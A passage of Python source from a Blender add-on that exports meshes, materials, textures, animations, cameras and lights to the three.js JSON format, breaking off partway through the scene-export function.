position.y += (bone.head * parentInvertedLocalMatrix).y + parentHeadTailDiff.y
position.z += (bone.head * parentInvertedLocalMatrix).z + parentHeadTailDiff.z
return armatureMatrix*position, change
def handle_rotation_channel(channel, frame, rotation):
change = False
if channel.array_index in [0, 1, 2, 3]:
for keyframe in channel.keyframe_points:
if keyframe.co[0] == frame:
change = True
value = channel.evaluate(frame)
if channel.array_index == 1:
rotation.x = value
elif channel.array_index == 2:
rotation.y = value
elif channel.array_index == 3:
rotation.z = value
elif channel.array_index == 0:
rotation.w = value
return change
def rotation(bone, frame, action, armatureMatrix):
# TODO: calculate rotation also from rotation_euler channels
rotation = mathutils.Vector((0,0,0,1))
change = False
ngroups = len(action.groups)
# animation grouped by bones
if ngroups > 0:
index = -1
for i in range(ngroups):
if action.groups[i].name == bone.name:
index = i
if index > -1:
for channel in action.groups[index].channels:
if "quaternion" in channel.data_path:
hasChanged = handle_rotation_channel(channel, frame, rotation)
change = change or hasChanged
# animation in raw fcurves
else:
bone_label = '"%s"' % bone.name
for channel in action.fcurves:
data_path = channel.data_path
if bone_label in data_path and "quaternion" in data_path:
hasChanged = handle_rotation_channel(channel, frame, rotation)
change = change or hasChanged
rot3 = rotation.to_3d()
rotation.xyz = rot3 * bone.matrix_local.inverted()
rotation.xyz = armatureMatrix * rotation.xyz
return rotation, change
# #####################################################
# Model exporter - materials
# #####################################################
def generate_color(i):
"""Generate hex color corresponding to integer.
Colors should have well defined ordering.
First N colors are hardcoded, then colors are random
(must seed random number generator with deterministic value
before getting colors).
"""
if i < len(COLORS):
#return "0x%06x" % COLORS[i]
return COLORS[i]
else:
#return "0x%06x" % int(0xffffff * random.random())
return int(0xffffff * random.random())
def generate_mtl(materials):
"""Generate dummy materials.
"""
mtl = {}
for m in materials:
index = materials[m]
mtl[m] = {
"DbgName": m,
"DbgIndex": index,
"DbgColor": generate_color(index),
"vertexColors" : False
}
return mtl
def value2string(v):
if type(v) == str and v[0:2] != "0x":
return '"%s"' % v
elif type(v) == bool:
return str(v).lower()
elif type(v) == list:
return "[%s]" % (", ".join(value2string(x) for x in v))
return str(v)
def generate_materials(mtl, materials, draw_type):
"""Generate JS array of materials objects
"""
mtl_array = []
for m in mtl:
index = materials[m]
# add debug information
# materials should be sorted according to how
# they appeared in OBJ file (for the first time)
# this index is identifier used in face definitions
mtl[m]['DbgName'] = m
mtl[m]['DbgIndex'] = index
mtl[m]['DbgColor'] = generate_color(index)
if draw_type in [ "BOUNDS", "WIRE" ]:
mtl[m]['wireframe'] = True
mtl[m]['DbgColor'] = 0xff0000
mtl_raw = ",\n".join(['\t\t"%s" : %s' % (n, value2string(v)) for n,v in sorted(mtl[m].items())])
mtl_string = "\t{\n%s\n\t}" % mtl_raw
mtl_array.append([index, mtl_string])
return ",\n\n".join([m for i,m in sorted(mtl_array)]), len(mtl_array)
def extract_materials(mesh, scene, option_colors, option_copy_textures, filepath):
world = scene.world
materials = {}
for m in mesh.materials:
if m:
materials[m.name] = {}
material = materials[m.name]
material['colorDiffuse'] = [m.diffuse_intensity * m.diffuse_color[0],
m.diffuse_intensity * m.diffuse_color[1],
m.diffuse_intensity * m.diffuse_color[2]]
material['colorSpecular'] = [m.specular_intensity * m.specular_color[0],
m.specular_intensity * m.specular_color[1],
m.specular_intensity * m.specular_color[2]]
material['colorAmbient'] = [m.ambient * material['colorDiffuse'][0],
m.ambient * material['colorDiffuse'][1],
m.ambient * material['colorDiffuse'][2]]
material['colorEmissive'] = [m.emit * material['colorDiffuse'][0],
m.emit * material['colorDiffuse'][1],
m.emit * material['colorDiffuse'][2]]
material['transparency'] = m.alpha
# not sure about mapping values to Blinn-Phong shader
# Blender uses INT from [1, 511] with default 0
# http://www.blender.org/documentation/blender_python_api_2_54_0/bpy.types.Material.html#bpy.types.Material.specular_hardness
material["specularCoef"] = m.specular_hardness
textures = guess_material_textures(m)
handle_texture('diffuse', textures, material, filepath, option_copy_textures)
handle_texture('light', textures, material, filepath, option_copy_textures)
handle_texture('normal', textures, material, filepath, option_copy_textures)
handle_texture('specular', textures, material, filepath, option_copy_textures)
handle_texture('bump', textures, material, filepath, option_copy_textures)
material["vertexColors"] = m.THREE_useVertexColors and option_colors
# can't really use this reliably to tell apart Phong from Lambert
# as Blender defaults to non-zero specular color
#if m.specular_intensity > 0.0 and (m.specular_color[0] > 0 or m.specular_color[1] > 0 or m.specular_color[2] > 0):
# material['shading'] = "Phong"
#else:
# material['shading'] = "Lambert"
if textures['normal']:
material['shading'] = "Phong"
else:
material['shading'] = m.THREE_materialType
material['blending'] = m.THREE_blendingType
material['depthWrite'] = m.THREE_depthWrite
material['depthTest'] = m.THREE_depthTest
material['transparent'] = m.use_transparency
return materials
def generate_materials_string(mesh, scene, option_colors, draw_type, option_copy_textures, filepath, offset):
random.seed(42) # to get well defined color order for debug materials
materials = {}
if mesh.materials:
for i, m in enumerate(mesh.materials):
mat_id = i + offset
if m:
materials[m.name] = mat_id
else:
materials["undefined_dummy_%0d" % mat_id] = mat_id
if not materials:
materials = { 'default': 0 }
# default dummy materials
mtl = generate_mtl(materials)
# extract real materials from the mesh
mtl.update(extract_materials(mesh, scene, option_colors, option_copy_textures, filepath))
return generate_materials(mtl, materials, draw_type)
def handle_texture(id, textures, material, filepath, option_copy_textures):
if textures[id] and textures[id]['texture'].users > 0 and len(textures[id]['texture'].users_material) > 0:
texName = 'map%s' % id.capitalize()
repeatName = 'map%sRepeat' % id.capitalize()
wrapName = 'map%sWrap' % id.capitalize()
slot = textures[id]['slot']
texture = textures[id]['texture']
image = texture.image
fname = extract_texture_filename(image)
material[texName] = fname
if option_copy_textures:
save_image(image, fname, filepath)
if texture.repeat_x != 1 or texture.repeat_y != 1:
material[repeatName] = [texture.repeat_x, texture.repeat_y]
if texture.extension == "REPEAT":
wrap_x = "repeat"
wrap_y = "repeat"
if texture.use_mirror_x:
wrap_x = "mirror"
if texture.use_mirror_y:
wrap_y = "mirror"
material[wrapName] = [wrap_x, wrap_y]
if slot.use_map_normal:
if slot.normal_factor != 1.0:
if id == "bump":
material['mapBumpScale'] = slot.normal_factor
else:
material['mapNormalFactor'] = slot.normal_factor
# #####################################################
# ASCII model generator
# #####################################################
def generate_ascii_model(meshes, morphs,
scene,
option_vertices,
option_vertices_truncate,
option_faces,
option_normals,
option_uv_coords,
option_materials,
option_colors,
option_bones,
option_skinning,
align_model,
flipyz,
option_scale,
option_copy_textures,
filepath,
option_animation_morph,
option_animation_skeletal,
option_frame_index_as_time,
option_frame_step):
vertices = []
vertex_offset = 0
vertex_offsets = []
nnormal = 0
normals = {}
ncolor = 0
colors = {}
nuvs = []
uv_layers = []
nmaterial = 0
materials = []
for mesh, object in meshes:
vertexUV = len(mesh.uv_textures) > 0
vertexColors = len(mesh.vertex_colors) > 0
mesh_extract_colors = option_colors and vertexColors
mesh_extract_uvs = option_uv_coords and vertexUV
if vertexUV:
active_uv_layer = mesh.uv_textures.active
if not active_uv_layer:
mesh_extract_uvs = False
if vertexColors:
active_col_layer = mesh.vertex_colors.active
if not active_col_layer:
mesh_extract_colors = False
vertex_offsets.append(vertex_offset)
vertex_offset += len(vertices)
vertices.extend(mesh.vertices[:])
if option_normals:
nnormal = extract_vertex_normals(mesh, normals, nnormal)
if mesh_extract_colors:
ncolor = extract_vertex_colors(mesh, colors, ncolor)
if mesh_extract_uvs:
nuvs = extract_uvs(mesh, uv_layers, nuvs)
if option_materials:
mesh_materials, nmaterial = generate_materials_string(mesh, scene, mesh_extract_colors, object.draw_type, option_copy_textures, filepath, nmaterial)
materials.append(mesh_materials)
morphTargets_string = ""
nmorphTarget = 0
if option_animation_morph:
chunks = []
for i, morphVertices in enumerate(morphs):
morphTarget = '{ "name": "%s_%06d", "vertices": [%s] }' % ("animation", i, morphVertices)
chunks.append(morphTarget)
morphTargets_string = ",\n\t".join(chunks)
nmorphTarget = len(morphs)
if align_model == 1:
center(vertices)
elif align_model == 2:
bottom(vertices)
elif align_model == 3:
top(vertices)
faces_string, nfaces = generate_faces(normals, uv_layers, colors, meshes, option_normals, option_colors, option_uv_coords, option_materials, option_faces)
bones_string, nbone = generate_bones(meshes, option_bones, flipyz)
indices_string, weights_string = generate_indices_and_weights(meshes, option_skinning)
materials_string = ",\n\n".join(materials)
model_string = TEMPLATE_MODEL_ASCII % {
"scale" : option_scale,
"uvs" : generate_uvs(uv_layers, option_uv_coords),
"normals" : generate_normals(normals, option_normals),
"colors" : generate_vertex_colors(colors, option_colors),
"materials" : materials_string,
"vertices" : generate_vertices(vertices, option_vertices_truncate, option_vertices),
"faces" : faces_string,
"morphTargets" : morphTargets_string,
"bones" : bones_string,
"indices" : indices_string,
"weights" : weights_string,
"animations" : generate_all_animations(option_animation_skeletal, option_frame_step, flipyz, option_frame_index_as_time)
}
text = TEMPLATE_FILE_ASCII % {
"nvertex" : len(vertices),
"nface" : nfaces,
"nuvs" : ",".join("%d" % n for n in nuvs),
"nnormal" : nnormal,
"ncolor" : ncolor,
"nmaterial" : nmaterial,
"nmorphTarget": nmorphTarget,
"nbone" : nbone,
"model" : model_string
}
return text, model_string
# #####################################################
# Model exporter - export single mesh
# #####################################################
def extract_meshes(objects, scene, export_single_model, option_scale, flipyz):
meshes = []
for object in objects:
if object.type == "MESH" and object.THREE_exportGeometry:
# collapse modifiers into mesh
mesh = object.to_mesh(scene, True, 'RENDER')
if not mesh:
raise Exception("Error, could not get mesh data from object [%s]" % object.name)
# preserve original name
mesh.name = object.name
if export_single_model:
if flipyz:
# that's what Blender's native export_obj.py does to flip YZ
X_ROT = mathutils.Matrix.Rotation(-math.pi/2, 4, 'X')
mesh.transform(X_ROT * object.matrix_world)
else:
mesh.transform(object.matrix_world)
mesh.update(calc_tessface=True)
mesh.calc_normals()
mesh.calc_tessface()
mesh.transform(mathutils.Matrix.Scale(option_scale, 4))
meshes.append([mesh, object])
return meshes
def generate_mesh_string(objects, scene,
option_vertices,
option_vertices_truncate,
option_faces,
option_normals,
option_uv_coords,
option_materials,
option_colors,
option_bones,
option_skinning,
align_model,
flipyz,
option_scale,
export_single_model,
option_copy_textures,
filepath,
option_animation_morph,
option_animation_skeletal,
option_frame_index_as_time,
option_frame_step):
meshes = extract_meshes(objects, scene, export_single_model, option_scale, flipyz)
morphs = []
if option_animation_morph:
original_frame = scene.frame_current # save animation state
scene_frames = range(scene.frame_start, scene.frame_end + 1, option_frame_step)
for index, frame in enumerate(scene_frames):
scene.frame_set(frame, 0.0)
anim_meshes = extract_meshes(objects, scene, export_single_model, option_scale, flipyz)
frame_vertices = []
for mesh, object in anim_meshes:
frame_vertices.extend(mesh.vertices[:])
if index == 0:
if align_model == 1:
offset = center(frame_vertices)
elif align_model == 2:
offset = bottom(frame_vertices)
elif align_model == 3:
offset = top(frame_vertices)
else:
offset = False
else:
if offset:
translate(frame_vertices, offset)
morphVertices = generate_vertices(frame_vertices, option_vertices_truncate, option_vertices)
morphs.append(morphVertices)
# remove temp meshes
for mesh, object in anim_meshes:
bpy.data.meshes.remove(mesh)
scene.frame_set(original_frame, 0.0) # restore animation state
text, model_string = generate_ascii_model(meshes, morphs,
scene,
option_vertices,
option_vertices_truncate,
option_faces,
option_normals,
option_uv_coords,
option_materials,
option_colors,
option_bones,
option_skinning,
align_model,
flipyz,
option_scale,
option_copy_textures,
filepath,
option_animation_morph,
option_animation_skeletal,
option_frame_index_as_time,
option_frame_step)
# remove temp meshes
for mesh, object in meshes:
bpy.data.meshes.remove(mesh)
return text, model_string
def export_mesh(objects,
scene, filepath,
option_vertices,
option_vertices_truncate,
option_faces,
option_normals,
option_uv_coords,
option_materials,
option_colors,
option_bones,
option_skinning,
align_model,
flipyz,
option_scale,
export_single_model,
option_copy_textures,
option_animation_morph,
option_animation_skeletal,
option_frame_step,
option_frame_index_as_time):
"""Export single mesh"""
text, model_string = generate_mesh_string(objects,
scene,
option_vertices,
option_vertices_truncate,
option_faces,
option_normals,
option_uv_coords,
option_materials,
option_colors,
option_bones,
option_skinning,
align_model,
flipyz,
option_scale,
export_single_model,
option_copy_textures,
filepath,
option_animation_morph,
option_animation_skeletal,
option_frame_index_as_time,
option_frame_step)
write_file(filepath, text)
print("writing", filepath, "done")
# #####################################################
# Scene exporter - render elements
# #####################################################
def generate_quat(quat):
return TEMPLATE_VEC4 % (quat.x, quat.y, quat.z, quat.w)
def generate_vec4(vec):
return TEMPLATE_VEC4 % (vec[0], vec[1], vec[2], vec[3])
def generate_vec3(vec, flipyz = False):
if flipyz:
return TEMPLATE_VEC3 % (vec[0], vec[2], vec[1])
return TEMPLATE_VEC3 % (vec[0], vec[1], vec[2])
def generate_vec2(vec):
return TEMPLATE_VEC2 % (vec[0], vec[1])
def generate_hex(number):
return TEMPLATE_HEX % number
def generate_string(s):
return TEMPLATE_STRING % s
def generate_string_list(src_list):
return ", ".join(generate_string(item) for item in src_list)
def generate_section(label, content):
return TEMPLATE_SECTION % (label, content)
def get_mesh_filename(mesh):
object_id = mesh["data"]["name"]
filename = "%s.js" % sanitize(object_id)
return filename
def generate_material_id_list(materials):
chunks = []
for material in materials:
chunks.append(material.name)
return chunks
def generate_group_id_list(obj):
chunks = []
for group in bpy.data.groups:
if obj.name in group.objects:
chunks.append(group.name)
return chunks
def generate_bool_property(property):
if property:
return "true"
return "false"
# #####################################################
# Scene exporter - objects
# #####################################################
def generate_objects(data):
chunks = []
for obj in data["objects"]:
if obj.type == "MESH" and obj.THREE_exportGeometry:
object_id = obj.name
#if len(obj.modifiers) > 0:
# geo_name = obj.name
#else:
geo_name = obj.data.name
geometry_id = "geo_%s" % geo_name
material_ids = generate_material_id_list(obj.material_slots)
group_ids = generate_group_id_list(obj)
if data["flipyz"]:
matrix_world = ROTATE_X_PI2 * obj.matrix_world
else:
matrix_world = obj.matrix_world
position, quaternion, scale = matrix_world.decompose()
rotation = quaternion.to_euler("ZYX")
# use empty material string for multi-material objects
# this will trigger use of MeshFaceMaterial in SceneLoader
material_string = '""'
if len(material_ids) == 1:
material_string = generate_string_list(material_ids)
group_string = ""
if len(group_ids) > 0:
group_string = generate_string_list(group_ids)
castShadow = obj.THREE_castShadow
receiveShadow = obj.THREE_receiveShadow
doubleSided = obj.THREE_doubleSided
visible = True
geometry_string = generate_string(geometry_id)
object_string = TEMPLATE_OBJECT % {
"object_id" : generate_string(object_id),
"geometry_id" : geometry_string,
"group_id" : group_string,
"material_id" : material_string,
"position" : generate_vec3(position),
"rotation" : generate_vec3(rotation),
"quaternion" : generate_quat(quaternion),
"scale" : generate_vec3(scale),
"castShadow" : generate_bool_property(castShadow),
"receiveShadow" : generate_bool_property(receiveShadow),
"doubleSided" : generate_bool_property(doubleSided),
"visible" : generate_bool_property(visible)
}
chunks.append(object_string)
elif obj.type == "EMPTY" or (obj.type == "MESH" and not obj.THREE_exportGeometry):
object_id = obj.name
group_ids = generate_group_id_list(obj)
if data["flipyz"]:
matrix_world = ROTATE_X_PI2 * obj.matrix_world
else:
matrix_world = obj.matrix_world
position, quaternion, scale = matrix_world.decompose()
rotation = quaternion.to_euler("ZYX")
group_string = ""
if len(group_ids) > 0:
group_string = generate_string_list(group_ids)
object_string = TEMPLATE_EMPTY % {
"object_id" : generate_string(object_id),
"group_id" : group_string,
"position" : generate_vec3(position),
"rotation" : generate_vec3(rotation),
"quaternion" : generate_quat(quaternion),
"scale" : generate_vec3(scale)
}
chunks.append(object_string)
return ",\n\n".join(chunks), len(chunks)
# #####################################################
# Scene exporter - geometries
# #####################################################
def generate_geometries(data):
chunks = []
geo_set = set()
for obj in data["objects"]:
if obj.type == "MESH" and obj.THREE_exportGeometry:
#if len(obj.modifiers) > 0:
# name = obj.name
#else:
name = obj.data.name
if name not in geo_set:
geometry_id = "geo_%s" % name
if data["embed_meshes"]:
embed_id = "emb_%s" % name
geometry_string = TEMPLATE_GEOMETRY_EMBED % {
"geometry_id" : generate_string(geometry_id),
"embed_id" : generate_string(embed_id)
}
else:
model_filename = os.path.basename(generate_mesh_filename(name, data["filepath"]))
geometry_string = TEMPLATE_GEOMETRY_LINK % {
"geometry_id" : generate_string(geometry_id),
"model_file" : generate_string(model_filename)
}
chunks.append(geometry_string)
geo_set.add(name)
return ",\n\n".join(chunks), len(chunks)
# #####################################################
# Scene exporter - textures
# #####################################################
def generate_textures_scene(data):
chunks = []
# TODO: extract just textures actually used by some objects in the scene
for texture in bpy.data.textures:
if texture.type == 'IMAGE' and texture.image and texture.users > 0 and len(texture.users_material) > 0:
img = texture.image
texture_id = img.name
texture_file = extract_texture_filename(img)
if data["copy_textures"]:
save_image(img, texture_file, data["filepath"])
extras = ""
if texture.repeat_x != 1 or texture.repeat_y != 1:
extras += ',\n "repeat": [%g, %g]' % (texture.repeat_x, texture.repeat_y)
if texture.extension == "REPEAT":
wrap_x = "repeat"
wrap_y = "repeat"
if texture.use_mirror_x:
wrap_x = "mirror"
if texture.use_mirror_y:
wrap_y = "mirror"
extras += ',\n "wrap": ["%s", "%s"]' % (wrap_x, wrap_y)
texture_string = TEMPLATE_TEXTURE % {
"texture_id" : generate_string(texture_id),
"texture_file" : generate_string(texture_file),
"extras" : extras
}
chunks.append(texture_string)
return ",\n\n".join(chunks), len(chunks)
def extract_texture_filename(image):
fn = bpy.path.abspath(image.filepath)
fn = os.path.normpath(fn)
fn_strip = os.path.basename(fn)
return fn_strip
def save_image(img, name, fpath):
dst_dir = os.path.dirname(fpath)
dst_path = os.path.join(dst_dir, name)
ensure_folder_exist(dst_dir)
if img.packed_file:
img.save_render(dst_path)
else:
src_path = bpy.path.abspath(img.filepath)
shutil.copy(src_path, dst_dir)
# #####################################################
# Scene exporter - materials
# #####################################################
def extract_material_data(m, option_colors):
world = bpy.context.scene.world
material = { 'name': m.name }
material['colorDiffuse'] = [m.diffuse_intensity * m.diffuse_color[0],
m.diffuse_intensity * m.diffuse_color[1],
m.diffuse_intensity * m.diffuse_color[2]]
material['colorSpecular'] = [m.specular_intensity * m.specular_color[0],
m.specular_intensity * m.specular_color[1],
m.specular_intensity * m.specular_color[2]]
material['colorAmbient'] = [m.ambient * material['colorDiffuse'][0],
m.ambient * material['colorDiffuse'][1],
m.ambient * material['colorDiffuse'][2]]
material['colorEmissive'] = [m.emit * material['colorDiffuse'][0],
m.emit * material['colorDiffuse'][1],
m.emit * material['colorDiffuse'][2]]
material['transparency'] = m.alpha
# not sure about mapping values to Blinn-Phong shader
# Blender uses INT from [1,511] with default 0
# http://www.blender.org/documentation/blender_python_api_2_54_0/bpy.types.Material.html#bpy.types.Material.specular_hardness
material["specularCoef"] = m.specular_hardness
material["vertexColors"] = m.THREE_useVertexColors and option_colors
material['mapDiffuse'] = ""
material['mapLight'] = ""
material['mapSpecular'] = ""
material['mapNormal'] = ""
material['mapBump'] = ""
material['mapNormalFactor'] = 1.0
material['mapBumpScale'] = 1.0
textures = guess_material_textures(m)
if textures['diffuse']:
material['mapDiffuse'] = textures['diffuse']['texture'].image.name
if textures['light']:
material['mapLight'] = textures['light']['texture'].image.name
if textures['specular']:
material['mapSpecular'] = textures['specular']['texture'].image.name
if textures['normal']:
material['mapNormal'] = textures['normal']['texture'].image.name
if textures['normal']['slot'].use_map_normal:
material['mapNormalFactor'] = textures['normal']['slot'].normal_factor
if textures['bump']:
material['mapBump'] = textures['bump']['texture'].image.name
if textures['bump']['slot'].use_map_normal:
material['mapBumpScale'] = textures['bump']['slot'].normal_factor
material['shading'] = m.THREE_materialType
material['blending'] = m.THREE_blendingType
material['depthWrite'] = m.THREE_depthWrite
material['depthTest'] = m.THREE_depthTest
material['transparent'] = m.use_transparency
return material
def guess_material_textures(material):
textures = {
'diffuse' : None,
'light' : None,
'normal' : None,
'specular': None,
'bump' : None
}
# just take first textures of each, for the moment three.js materials can't handle more
# assume diffuse comes before lightmap, normalmap has checked flag
for i in range(len(material.texture_slots)):
slot = material.texture_slots[i]
if slot:
texture = slot.texture
if slot.use and texture and texture.type == 'IMAGE':
# normal map in Blender UI: textures => image sampling => normal map
if texture.use_normal_map:
textures['normal'] = { "texture": texture, "slot": slot }
# bump map in Blender UI: textures => influence => geometry => normal
elif slot.use_map_normal:
textures['bump'] = { "texture": texture, "slot": slot }
elif slot.use_map_specular or slot.use_map_hardness:
textures['specular'] = { "texture": texture, "slot": slot }
else:
if not textures['diffuse'] and not slot.blend_type == 'MULTIPLY':
textures['diffuse'] = { "texture": texture, "slot": slot }
else:
textures['light'] = { "texture": texture, "slot": slot }
if textures['diffuse'] and textures['normal'] and textures['light'] and textures['specular'] and textures['bump']:
break
return textures
def generate_material_string(material):
material_id = material["name"]
# default to Lambert
shading = material.get("shading", "Lambert")
# normal and bump mapped materials must use Phong
# to get all required parameters for normal shader
if material['mapNormal'] or material['mapBump']:
shading = "Phong"
type_map = {
"Lambert" : "MeshLambertMaterial",
"Phong" : "MeshPhongMaterial"
}
material_type = type_map.get(shading, "MeshBasicMaterial")
parameters = '"color": %d' % rgb2int(material["colorDiffuse"])
parameters += ', "ambient": %d' % rgb2int(material["colorDiffuse"])
parameters += ', "emissive": %d' % rgb2int(material["colorEmissive"])
parameters += ', "opacity": %.2g' % material["transparency"]
if shading == "Phong":
parameters += ', "ambient": %d' % rgb2int(material["colorAmbient"])
parameters += ', "emissive": %d' % rgb2int(material["colorEmissive"])
parameters += ', "specular": %d' % rgb2int(material["colorSpecular"])
parameters += ', "shininess": %.1g' % material["specularCoef"]
colorMap = material['mapDiffuse']
lightMap = material['mapLight']
specularMap = material['mapSpecular']
normalMap = material['mapNormal']
bumpMap = material['mapBump']
normalMapFactor = material['mapNormalFactor']
bumpMapScale = material['mapBumpScale']
if colorMap:
parameters += ', "map": %s' % generate_string(colorMap)
if lightMap:
parameters += ', "lightMap": %s' % generate_string(lightMap)
if specularMap:
parameters += ', "specularMap": %s' % generate_string(specularMap)
if normalMap:
parameters += ', "normalMap": %s' % generate_string(normalMap)
if bumpMap:
parameters += ', "bumpMap": %s' % generate_string(bumpMap)
if normalMapFactor != 1.0:
parameters += ', "normalMapFactor": %g' % normalMapFactor
if bumpMapScale != 1.0:
parameters += ', "bumpMapScale": %g' % bumpMapScale
if material['vertexColors']:
parameters += ', "vertexColors": "vertex"'
if material['transparent']:
parameters += ', "transparent": true'
parameters += ', "blending": "%s"' % material['blending']
if not material['depthWrite']:
parameters += ', "depthWrite": false'
if not material['depthTest']:
parameters += ', "depthTest": false'
material_string = TEMPLATE_MATERIAL_SCENE % {
"material_id" : generate_string(material_id),
"type" : generate_string(material_type),
"parameters" : parameters
}
return material_string
def generate_materials_scene(data):
chunks = []
def material_is_used(mat):
minimum_users = 1
if mat.use_fake_user:
minimum_users = 2 #we must ignore the "fake user" in this case
return mat.users >= minimum_users
used_materials = [m for m in bpy.data.materials if material_is_used(m)]
for m in used_materials:
material = extract_material_data(m, data["use_colors"])
material_string = generate_material_string(material)
chunks.append(material_string)
return ",\n\n".join(chunks), len(chunks)
# #####################################################
# Scene exporter - cameras
# #####################################################
def generate_cameras(data):
chunks = []
if data["use_cameras"]:
cams = bpy.data.objects
cams = [ob for ob in cams if (ob.type == 'CAMERA')]
if not cams:
camera = DEFAULTS["camera"]
if camera["type"] == "PerspectiveCamera":
camera_string = TEMPLATE_CAMERA_PERSPECTIVE % {
"camera_id" : generate_string(camera["name"]),
"fov" : camera["fov"],
"aspect" : camera["aspect"],
"near" : camera["near"],
"far" : camera["far"],
"position" : generate_vec3(camera["position"]),
"target" : generate_vec3(camera["target"])
}
elif camera["type"] == "OrthographicCamera":
camera_string = TEMPLATE_CAMERA_ORTHO % {
"camera_id" : generate_string(camera["name"]),
"left" : camera["left"],
"right" : camera["right"],
"top" : camera["top"],
"bottom" : camera["bottom"],
"near" : camera["near"],
"far" : camera["far"],
"position" : generate_vec3(camera["position"]),
"target" : generate_vec3(camera["target"])
}
chunks.append(camera_string)
else:
for cameraobj in cams:
camera = bpy.data.cameras[cameraobj.data.name]
if camera.id_data.type == "PERSP":
camera_string = TEMPLATE_CAMERA_PERSPECTIVE % {
"camera_id" : generate_string(cameraobj.name),
"fov" : (camera.angle / 3.14) * 180.0,
"aspect" : 1.333,
"near" : camera.clip_start,
"far" : camera.clip_end,
"position" : generate_vec3([cameraobj.location[0], -cameraobj.location[1], cameraobj.location[2]], data["flipyz"]),
"target" : generate_vec3([0, 0, 0])
}
elif camera.id_data.type == "ORTHO":
camera_string = TEMPLATE_CAMERA_ORTHO % {
"camera_id" : generate_string(camera.name),
"left" : -(camera.angle_x * camera.ortho_scale),
"right" : (camera.angle_x * camera.ortho_scale),
"top" : (camera.angle_y * camera.ortho_scale),
"bottom" : -(camera.angle_y * camera.ortho_scale),
"near" : camera.clip_start,
"far" : camera.clip_end,
"position" : generate_vec3([cameraobj.location[0], -cameraobj.location[1], cameraobj.location[2]], data["flipyz"]),
"target" : generate_vec3([0, 0, 0])
}
chunks.append(camera_string)
return ",\n\n".join(chunks), len(chunks)
# #####################################################
# Scene exporter - lights
# #####################################################
def generate_lights(data):
chunks = []
if data["use_lights"]:
lamps = data["objects"]
lamps = [ob for ob in lamps if (ob.type == 'LAMP')]
for lamp in lamps:
light_string = ""
concrete_lamp = lamp.data
if concrete_lamp.type == "POINT":
light_string = TEMPLATE_LIGHT_POINT % {
"light_id" : generate_string(concrete_lamp.name),
"position" : generate_vec3(lamp.location, data["flipyz"]),
"rotation" : generate_vec3(lamp.rotation_euler, data["flipyz"]),
"color" : rgb2int(concrete_lamp.color),
"distance" : concrete_lamp.distance,
"intensity" : concrete_lamp.energy
}
elif concrete_lamp.type == "SUN":
light_string = TEMPLATE_LIGHT_SUN % {
"light_id" : generate_string(concrete_lamp.name),
"position" : generate_vec3(lamp.location, data["flipyz"]),
"rotation" : generate_vec3(lamp.rotation_euler, data["flipyz"]),
"color" : rgb2int(concrete_lamp.color),
"distance" : concrete_lamp.distance,
"intensity" : concrete_lamp.energy
}
elif concrete_lamp.type == "SPOT":
light_string = TEMPLATE_LIGHT_SPOT % {
"light_id" : generate_string(concrete_lamp.name),
"position" : generate_vec3(lamp.location, data["flipyz"]),
"rotation" : generate_vec3(lamp.rotation_euler, data["flipyz"]),
"color" : rgb2int(concrete_lamp.color),
"distance" : concrete_lamp.distance,
"intensity" : concrete_lamp.energy,
"use_shadow" : concrete_lamp.use_shadow,
"angle" : concrete_lamp.spot_size
}
elif concrete_lamp.type == "HEMI":
light_string = TEMPLATE_LIGHT_HEMI % {
"light_id" : generate_string(concrete_lamp.name),
"position" : generate_vec3(lamp.location, data["flipyz"]),
"rotation" : generate_vec3(lamp.rotation_euler, data["flipyz"]),
"color" : rgb2int(concrete_lamp.color),
"distance" : concrete_lamp.distance,
"intensity" : concrete_lamp.energy
}
elif concrete_lamp.type == "AREA":
light_string = TEMPLATE_LIGHT_AREA % {
"light_id" : generate_string(concrete_lamp.name),
"position" : generate_vec3(lamp.location, data["flipyz"]),
"rotation" : generate_vec3(lamp.rotation_euler, data["flipyz"]),
"color" : rgb2int(concrete_lamp.color),
"distance" : concrete_lamp.distance,
"intensity" : concrete_lamp.energy,
"gamma" : concrete_lamp.gamma,
"shape" : concrete_lamp.shape,
"size" : concrete_lamp.size,
"size_y" : concrete_lamp.size_y
}
chunks.append(light_string)
if not lamps:
lamps.append(DEFAULTS["light"])
return ",\n\n".join(chunks), len(chunks)
# #####################################################
# Scene exporter - embedded meshes
# #####################################################
def generate_embeds(data):
if data["embed_meshes"]:
chunks = []
for e in data["embeds"]:
embed = '"emb_%s": {%s}' % (e, data["embeds"][e])
chunks.append(embed)
return ",\n\n".join(chunks)
return ""
# #####################################################
# Scene exporter - generate ASCII scene
# #####################################################
def generate_ascii_scene(data):
objects, nobjects = generate_objects(data)
geometries, ngeometries = generate_geometries(data)
textures, ntextures = generate_textures_scene(data)
materials, nmaterials = generate_materials_scene(data)
lights, nlights = generate_lights(data)
cameras, ncameras = generate_cameras(data)
embeds = generate_embeds(data)
if nlights > 0:
if nobjects > 0:
objects = objects + ",\n\n" + lights
else:
objects = lights
nobjects += nlights
if ncameras > 0:
if nobjects > 0:
objects = objects + ",\n\n" + cameras
else:
objects = cameras
nobjects += ncameras
basetype = "relativeTo"
if data["base_html"]:
basetype += "HTML"
else:
basetype += "Scene"
sections = [
["objects", objects],
["geometries", geometries],
["textures", textures],
["materials", materials],
["embeds", embeds]
]
chunks = []
for label, content in sections:
if content:
chunks.append(generate_section(label, content))
sections_string = "\n".join(chunks)
default_camera = ""
if data["use_cameras"]:
cams = [ob for ob in bpy.data.objects if (ob.type == 'CAMERA' and ob.select)]
if not cams:
default_camera = "default_camera"
else:
default_camera = cams[0].name
parameters = {
"fname" : data["source_file"],
"sections" : sections_string,
"bgcolor" : generate_vec3(DEFAULTS["bgcolor"]),
"bgalpha" : DEFAULTS["bgalpha"],
"defcamera" : generate_string(default_camera),
"nobjects" : nobjects,
"ngeometries" : ngeometries,
"ntextures" : ntextures,
"basetype" : generate_string(basetype),
"nmaterials" : nmaterials,
"position" : generate_vec3(DEFAULTS["position"]),
"rotation" : generate_vec3(DEFAULTS["rotation"]),
"scale" : generate_vec3(DEFAULTS["scale"])
}
text = TEMPLATE_SCENE_ASCII % parameters
return text
def export_scene(scene, filepath, flipyz, option_colors, option_lights, option_cameras, option_embed_meshes, embeds, option_url_base_html, option_copy_textures):
source_file = os.path.basename(bpy.data.filepath)
# objects are contained in scene and linked groups
objects = []
# get scene objects
sceneobjects = scene.objects
for obj in sceneobjects:
objects.append(obj)
scene_text = ""
data = {
"scene" : scene,
"objects" : objects,
"embeds" : embeds,
"source_file" : source_file,
"filepath" : filepath,
"flipyz" : flipyz,
"use_colors" : option_colors,
"use_lights" : option_lights,
"use_cameras" : option_cameras,
"embed_meshes" : option_embed_meshes,
"base_html" : option_url_base_html,
